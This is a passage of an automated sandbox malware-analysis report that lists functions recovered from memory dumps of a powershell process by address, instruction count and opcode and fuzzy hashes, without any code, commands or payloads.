                        • Instruction Fuzzy Hash: CE4103F1A11202DBDF268F64C550A7ABBF39FC6288F1884A5DD219F291C731DC48CBA1
                        Function 04F170A8 Relevance: .1, Instructions: 114COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f21ccf0b0f00c7bc59c34f8331bf90e4a6b0428d1ab59412aa4325c12437752e
                        • Instruction ID: f814d00372f8a3e836de215a3eb4eb1315973b818f8924c06d056892cacf4130
                        • Opcode Fuzzy Hash: f21ccf0b0f00c7bc59c34f8331bf90e4a6b0428d1ab59412aa4325c12437752e
                        • Instruction Fuzzy Hash: C2411B34B042048FDB14EF69C454AADBBF2EF8D711F244499E806AB3A1DB35AC42CB60
                        Function 04F12B00 Relevance: .1, Instructions: 107COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c7b8b4fb90559b25db13dbef0d4b92438bcb29f75d756191996a47456e3870ff
                        • Instruction ID: 9e64a3ac63dec87f514bfc0663d95ba4b1ff5234f45a0c90ed4a35c98de273c9
                        • Opcode Fuzzy Hash: c7b8b4fb90559b25db13dbef0d4b92438bcb29f75d756191996a47456e3870ff
                        • Instruction Fuzzy Hash: 93411774A006059FCB09CF99C5D8AAAF7B1FF88310B128599D915AB364C736FC52CFA4
                        Function 04F17081 Relevance: .1, Instructions: 106COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8b41505d0afc47a404883d3cdfcd8bb060eb1878a580f772992e3bb15333c761
                        • Instruction ID: 629b00271f8b479d90e3f9bb4538cd4c5011c4e2c236fb114feb1774223b38ad
                        • Opcode Fuzzy Hash: 8b41505d0afc47a404883d3cdfcd8bb060eb1878a580f772992e3bb15333c761
                        • Instruction Fuzzy Hash: A2414F34B082458FCB15DF68C894AADBBF1AF8E314F185099D805FB362DB35AC42CB60
                        Function 04F1E000 Relevance: .1, Instructions: 104COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4f701f38458948a0a9f18e44f6704bcb92c9ecf122eb4c6c9be54e8afc13cae5
                        • Instruction ID: 2648637b87a7a5a14b848c971e8a93d0331050ed421a771cbb402b89e5ce6a7d
                        • Opcode Fuzzy Hash: 4f701f38458948a0a9f18e44f6704bcb92c9ecf122eb4c6c9be54e8afc13cae5
                        • Instruction Fuzzy Hash: 4D417F35B00200CFDB10DF68D458AADBBF6EF89315F158569D80AEB3A1DB34AC82CB50
                        Function 04F1C478 Relevance: .1, Instructions: 101COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f841b15c9c87e30ca6cd04b5c696fced3cf41a64933ef3bf0e7165c496299955
                        • Instruction ID: 29f4e16c460641b5cc40efde82fb6c7b7fc83dacb74c9fc8d3716b65c3a85e4f
                        • Opcode Fuzzy Hash: f841b15c9c87e30ca6cd04b5c696fced3cf41a64933ef3bf0e7165c496299955
                        • Instruction Fuzzy Hash: F831C0313002418FE705EB38E840B9AB792FFC4216F008229D50ACB365DF71A812CBA1
                        Function 04F1AF50 Relevance: .1, Instructions: 88COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fae4bdd184b8413d87eca8ccdc69041063276709a41a936c06575a61ef888c7c
                        • Instruction ID: 4e2158f2d201b83fc14083d1bc7acc932978a72c1c1094137f7fdc6a5f2bd4a3
                        • Opcode Fuzzy Hash: fae4bdd184b8413d87eca8ccdc69041063276709a41a936c06575a61ef888c7c
                        • Instruction Fuzzy Hash: C4314970E012099FDB05DFA9D494BAEBBF6EF88310F158029E505EB364EB74AC428B51
                        Function 04F1AF60 Relevance: .1, Instructions: 84COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0d4d3428d94dd1ec5d3337554cd4b429fa3bba24a38dd2ba88ba68ee7d8d827c
                        • Instruction ID: 21ad7b43d0127a6d74120407a4e342516b24ff86e0b33ef369059fc80663c788
                        • Opcode Fuzzy Hash: 0d4d3428d94dd1ec5d3337554cd4b429fa3bba24a38dd2ba88ba68ee7d8d827c
                        • Instruction Fuzzy Hash: 67314F70E012099FDB04DF69D4947AEBBF6EFC8310F158029E505E7364EB74AC028B50
                        Function 04F1AE18 Relevance: .1, Instructions: 83COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 480cad568c6ac70500d4450b6961715b91c5f7bee0c78ef2517ee3c50ba4d154
                        • Instruction ID: a74483cce1c8eec26c5845b0a60b440bf59ffe8ff5ffafcbaaef6f515f6d03b3
                        • Opcode Fuzzy Hash: 480cad568c6ac70500d4450b6961715b91c5f7bee0c78ef2517ee3c50ba4d154
                        • Instruction Fuzzy Hash: 6531D1B4E442459FEB05DBB4D894AAEBBB2EFC4302F1084A9D501AB391DB39AD01CF51
                        Function 04F1E0A8 Relevance: .1, Instructions: 81COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c7a20d3c564f93347c4649bb7e097bca5dcf5b07761a4c99ab74898f95604538
                        • Instruction ID: 3272b192f09056ec854ec9f2f7d4850497175277245ba9d4bdb04263d67c541e
                        • Opcode Fuzzy Hash: c7a20d3c564f93347c4649bb7e097bca5dcf5b07761a4c99ab74898f95604538
                        • Instruction Fuzzy Hash: CA316D70B042048FDB14DF68D498AADBBF2EF99214F14856DD806EB3A1DF75AC86CB50
                        Function 04F1B088 Relevance: .1, Instructions: 81COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 11276e341054c862bb8ed28daee7c4a6f70b3b83aac8909f5fca082f0d728e23
                        • Instruction ID: 2abcb7ca4d96b37033e43663dff74be9d2c835051515190537bdf3317f7b9a53
                        • Opcode Fuzzy Hash: 11276e341054c862bb8ed28daee7c4a6f70b3b83aac8909f5fca082f0d728e23
                        • Instruction Fuzzy Hash: 8B21D171E042488FDB15DBAED80079EBFF6AB88320F14846ED409E7350CB75A805CBA5
                        Function 04F1E0B8 Relevance: .1, Instructions: 77COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b35abc9ae14784300b69a5000b04396ca9dafb5def69bc68718e78f38e6cfb84
                        • Instruction ID: aaeb9be6e45adc85484439972e582d4ad7dbcb6155618d977a2a7c25b9ffd6cf
                        • Opcode Fuzzy Hash: b35abc9ae14784300b69a5000b04396ca9dafb5def69bc68718e78f38e6cfb84
                        • Instruction Fuzzy Hash: EA315A70B002148FDB14DF68D458A9EBBF6FF88215F048469D806EB3A0DF34AC81CB90
                        Function 04F1AE28 Relevance: .1, Instructions: 77COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 470f46c7a5e7defd26fc044efee286021a57075a401db99cb3f3269e3f3713e5
                        • Instruction ID: a055c1c2b75fe4ed7f94cf56dc0af3d2edf4bb7b1672ecedf16d648cf6737f76
                        • Opcode Fuzzy Hash: 470f46c7a5e7defd26fc044efee286021a57075a401db99cb3f3269e3f3713e5
                        • Instruction Fuzzy Hash: E53171B4E402099FEB04EFA4D854AAE77B2EFC4306F108469D611AB394DB39AD018F90
                        Function 04A3F3D8 Relevance: .1, Instructions: 76COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1468307888.0000000004A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A3D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4a3d000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 37aad3be152790dea7c8ab59e86b025dbedb287a9cc4f42fdcf8266a78c8d323
                        • Instruction ID: 8f44f17ed782175d707cbcd0501ba8ad3b3ec9b6bcf8e254ef441959dcfdeaf7
                        • Opcode Fuzzy Hash: 37aad3be152790dea7c8ab59e86b025dbedb287a9cc4f42fdcf8266a78c8d323
                        • Instruction Fuzzy Hash: F5212476A04300EFDB05DF10D9C0B16BB61FB88315F20C5ADF9490A256D336E856CBA1
                        Function 04F194D8 Relevance: .1, Instructions: 74COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 983d8857bbae511efc9af28d0ffef1ef87383fde6cbdb3df5e9e87cb43c733a2
                        • Instruction ID: ce3233689e5e183a800797d969e5948d974ac52ea8abb04fa6058350b0a912af
                        • Opcode Fuzzy Hash: 983d8857bbae511efc9af28d0ffef1ef87383fde6cbdb3df5e9e87cb43c733a2
                        • Instruction Fuzzy Hash: 783180B0D053448EDB65CF6AC08879AFFF2EF88324F28C05DD45EAB215D6B46446CB65
                        Function 04A3F02C Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1468307888.0000000004A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A3D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4a3d000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7995222e14d1b474852b2bbb3d77c52f9c5a076b9b27d3ce446943cca8903097
                        • Instruction ID: 96d8c8761cc8b8d4d6b713e069436abcf1cd193ab762e63a8625dd5c31bd3638
                        • Opcode Fuzzy Hash: 7995222e14d1b474852b2bbb3d77c52f9c5a076b9b27d3ce446943cca8903097
                        • Instruction Fuzzy Hash: 56213775A04304DFEB10DF28D9C4B16BB61FB84326F20C56DFA094B246E336E846CB61
                        Function 04F194E8 Relevance: .1, Instructions: 69COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d3f9f5b0d50c2f5f942551655bc1572b56887bbe152563f51b37e9387afabd86
                        • Instruction ID: a18bdd338a794430d103546978a45a5e73132da02ef6b7fc3c7814041def615a
                        • Opcode Fuzzy Hash: d3f9f5b0d50c2f5f942551655bc1572b56887bbe152563f51b37e9387afabd86
                        • Instruction Fuzzy Hash: 55216DB0D053448EDB64DF6AC08878AFFF2EB88314F28C01DD45EA7255D6B46481CBA0
                        Function 04F17744 Relevance: .1, Instructions: 62COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5687fb21b23cf9f8f714252a090dddced6725d39bf85de9b900a4b489f952e47
                        • Instruction ID: 0379069be9caa168ff27d0193815d808752cfe2115389084f692d83e3b153450
                        • Opcode Fuzzy Hash: 5687fb21b23cf9f8f714252a090dddced6725d39bf85de9b900a4b489f952e47
                        • Instruction Fuzzy Hash: 4F11FE3AB002188FDF04EB68D940A9DB7F6EFCC615B0440A8E90DDB765DB35ED128B90
                        Function 04A3F3D3 Relevance: .1, Instructions: 57COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1468307888.0000000004A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A3D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4a3d000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 05050efde7f80e2bacd3aed6f2bd0425f272660e14b98707f66944896a751249
                        • Instruction ID: 0a8bbc1ba92e294c3d4a0b5ba413f95b01ac201b0b67be655dd2baaf03a2326e
                        • Opcode Fuzzy Hash: 05050efde7f80e2bacd3aed6f2bd0425f272660e14b98707f66944896a751249
                        • Instruction Fuzzy Hash: 5D219D76904240DFCF06CF10D9C4B16BF72FB88314F24C5A9E9494A656C33AD46ACF91
                        Function 04A3F027 Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1468307888.0000000004A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A3D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4a3d000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bb2c615d30f077614c2f6e701b51ce97adb4e7859af34b9b872f5e3f8473804e
                        • Instruction ID: 25e24f34e3c445c8b35bb432cf83f81ee23cbcc169e0e95da793e7f8cc90ab07
                        • Opcode Fuzzy Hash: bb2c615d30f077614c2f6e701b51ce97adb4e7859af34b9b872f5e3f8473804e
                        • Instruction Fuzzy Hash: 9811DD79904280CFDB11CF24D5C0B15FFA1FB84325F28C6AEE9494B656D33AE44ACB61
                        Function 04F1BDD0 Relevance: .0, Instructions: 50COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 79daa757521415a9311f3c1dc67731b845a855913688129dd68abfe469218dd0
                        • Instruction ID: 04bb3bbc6901093dddf0fa5e92d668e6457320531f9b6c511b59a41ca7ca4020
                        • Opcode Fuzzy Hash: 79daa757521415a9311f3c1dc67731b845a855913688129dd68abfe469218dd0
                        • Instruction Fuzzy Hash: F601F5316087848FD729CB75D594A59BFF4EF46220F0848EED08ECB6B2D621F845C701
                        Function 04F1E388 Relevance: .0, Instructions: 48COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d189eb7e508229a573a0f8646d5f8e0a7a467abd4de42b3403c8cdd64d1d2370
                        • Instruction ID: aa88e7f5465fa5c361a27ecdd8cf3cea90dd4ee231dc10ec7831a479ad629778
                        • Opcode Fuzzy Hash: d189eb7e508229a573a0f8646d5f8e0a7a467abd4de42b3403c8cdd64d1d2370
                        • Instruction Fuzzy Hash: 3B11F3352047548FC728DF75D09089ABBF6AF8921576489ADD48A8BBA0CB32E846CF50
                        Function 04F1DF80 Relevance: .0, Instructions: 48COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 00bf854873be45d22c901ec712c3384e67c841291c4b3e52f08e125d445b8e24
                        • Instruction ID: 3df3d3ba5e767271438f97d247e0789002979f098d3b82ed220f84c034d21034
                        • Opcode Fuzzy Hash: 00bf854873be45d22c901ec712c3384e67c841291c4b3e52f08e125d445b8e24
                        • Instruction Fuzzy Hash: 55019E35B00214DFCB119F74E848AAEFBF6FB88319F04416DE51AD3242DB32A911CB90
                        Function 04A3D01D Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1468307888.0000000004A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A3D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4a3d000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3445697bbd3a06ea26144a01b29ae9104e646ee0b24b09a12331c9db982a54e8
                        • Instruction ID: 876f1c82fc9893236877a31a4d39558fadc5165512c9f53a4d16f68e13bb0266
                        • Opcode Fuzzy Hash: 3445697bbd3a06ea26144a01b29ae9104e646ee0b24b09a12331c9db982a54e8
                        • Instruction Fuzzy Hash: 4201F771504304DEF7104F25DC80B67BF98DF42A26F18C01AFC5A5B642E278A441CBB1
                        Function 04A3D007 Relevance: .0, Instructions: 44COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1468307888.0000000004A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A3D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4a3d000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 16f046f540fca64779edd09f7445b9bdd6dbc946d437973d676b656c10e1fe3b
                        • Instruction ID: bf56f35aca195758b9822fe1b382dbeef6439f7b895e07ac61ff14d51fe444bb
                        • Opcode Fuzzy Hash: 16f046f540fca64779edd09f7445b9bdd6dbc946d437973d676b656c10e1fe3b
                        • Instruction Fuzzy Hash: 1D01527140E3C49FE7124B259894B52BFB4DF43625F1D80CBE8988F293C2695849C772
                        Function 04F1C000 Relevance: .0, Instructions: 43COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 699302b7a2f50b5dfd74dca2de96683757fbe335575aa793eab70f5e4855820e
                        • Instruction ID: da7ef4241594782aa53242f7966fff47d7834656fea5f45ad0881ca3ca0eb153
                        • Opcode Fuzzy Hash: 699302b7a2f50b5dfd74dca2de96683757fbe335575aa793eab70f5e4855820e
                        • Instruction Fuzzy Hash: 37F0813570D3D11FD7118A7A9C949AB7FE9AB9622070841AFE589C7652CAA188048B60
                        Function 04F1F8A1 Relevance: .0, Instructions: 39COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c9dc34344a1453174b4e22b2f04b9b5ca0e6d5ea975b26354977e3b7b7f226b7
                        • Instruction ID: 51e31906d0344c4912be539e4314503d7e907f33f9f7406ff4500472c28d3bdf
                        • Opcode Fuzzy Hash: c9dc34344a1453174b4e22b2f04b9b5ca0e6d5ea975b26354977e3b7b7f226b7
                        • Instruction Fuzzy Hash: E4011E71D0478AEBCB04DFE4C9446DDFBB1FF99300F20071AD015A6611EBB06696CB80
                        Function 04F1C010 Relevance: .0, Instructions: 38COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fdcd46ce4107ebd4f494ce4941a397d71ac2dcc29a2defd2d8379236d9bbe06c
                        • Instruction ID: f281d581b5065694d169aed5667594c6ca79eaa78635b6f72c572dd282e544bb
                        • Opcode Fuzzy Hash: fdcd46ce4107ebd4f494ce4941a397d71ac2dcc29a2defd2d8379236d9bbe06c
                        • Instruction Fuzzy Hash: 29F05E367092655FD7108A7A9C44DBBBFEDEFC9621B04407AF958C7351DAB1DD0086A0
                        Function 04A3D9A7 Relevance: .0, Instructions: 37COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1468307888.0000000004A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A3D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4a3d000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 912e172a4fbd2a581ffce4de8bc6d02e69dd219f53257188bdab4d18d63cb597
                        • Instruction ID: a4049992fe7f619ec2efd65e65fc0faf20acce9a73615920cf0d35bb2bb99429
                        • Opcode Fuzzy Hash: 912e172a4fbd2a581ffce4de8bc6d02e69dd219f53257188bdab4d18d63cb597
                        • Instruction Fuzzy Hash: 2AF03776200600AF87208F0AC984C27FBA9EBC4774719C05AE84A8BA12C671FC41CAA0
                        Function 04F191C0 Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cb15654c382474040868ba9e7874ec11fcb5d25d104be855eba7f1c784da1f8c
                        • Instruction ID: c6bfab658100930c58807f26d24b2144229e5795cd77f9114d34ffa9f241e34b
                        • Opcode Fuzzy Hash: cb15654c382474040868ba9e7874ec11fcb5d25d104be855eba7f1c784da1f8c
                        • Instruction Fuzzy Hash: 45F0F6716082509BE341AF69C41839B7BB5DBC235AF14815FD90947386CE3A2807DBE1
                        Function 04A3D998 Relevance: .0, Instructions: 33COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1468307888.0000000004A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A3D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4a3d000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ab86c85ef812c300aae929f4e8af3f5b89bb83d7e8d0bc3011fe62a6b3e37e8d
                        • Instruction ID: f9a4c41f8b6f0415f64002aed33f1d07d452beb996b32b431299e51206fcc43a
                        • Opcode Fuzzy Hash: ab86c85ef812c300aae929f4e8af3f5b89bb83d7e8d0bc3011fe62a6b3e37e8d
                        • Instruction Fuzzy Hash: 89F0F975100A80AFD725CF06CD85D23BBB9EB85764B198499F85A8B712D671FC42CF60
                        Function 04F1DF20 Relevance: .0, Instructions: 33COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e7781a456a3fac13c25ed21697a1576a2cb02b59e858cc3aa2e104b04244ec54
                        • Instruction ID: 784bf29af57a76daf15561e1a564e9ac53a4e9c120c6b89bb8a8be548aadd3e6
                        • Opcode Fuzzy Hash: e7781a456a3fac13c25ed21697a1576a2cb02b59e858cc3aa2e104b04244ec54
                        • Instruction Fuzzy Hash: 3EF012357041508FC3118F2DD494D6ABBF6AFCA71571910EDE499DB772DA61DC02CB90
                        Function 04F1F8B0 Relevance: .0, Instructions: 33COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4ee77c59015038e4de15a273abd9bc15122f5c74d2f929a260a9e7f4572de856
                        • Instruction ID: 34b7595377bfb8e5459afcea0ca1ef1b4d0281461ea501e58616226222cfe8f8
                        • Opcode Fuzzy Hash: 4ee77c59015038e4de15a273abd9bc15122f5c74d2f929a260a9e7f4572de856
                        • Instruction Fuzzy Hash: F901A471D1479AEBCB04DFE4C9446EDFBB5FF99300F10172AE015A6600EBB06696CB91
                        Function 04F17A30 Relevance: .0, Instructions: 33COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e7b1382102a448df7b1b5917594f1b05ce99825723cff0bf0140ba953106d6b1
                        • Instruction ID: 698d730073c99d613053e01e9f282d34e318290c3f77a12bbe2871931d8c32ac
                        • Opcode Fuzzy Hash: e7b1382102a448df7b1b5917594f1b05ce99825723cff0bf0140ba953106d6b1
                        • Instruction Fuzzy Hash: 47F027313002145FDB10AB59E840A6FB7E9FBC8672B00052DE50ED3610DF31BC428750
                        Function 04F17A2C Relevance: .0, Instructions: 33COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1469127224.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_4f10000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 907ca08863f2df31776b5c6e522eb2cb3abc02446bdfa1fa56c36c4b0c413225
                        • Instruction ID: 89745029794c12daf014880b2abfe1a28255b6e773ba76877d1c5e27a5d61d60
                        • Opcode Fuzzy Hash: 907ca08863f2df31776b5c6e522eb2cb3abc02446bdfa1fa56c36c4b0c413225
                        • Instruction Fuzzy Hash: 5BF027317006119FEB20AB55E8806AFB7E5FBCC272B00052DE50ED3610DF75BD828751
                        Function 04F1775F Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        Memory Dump Source
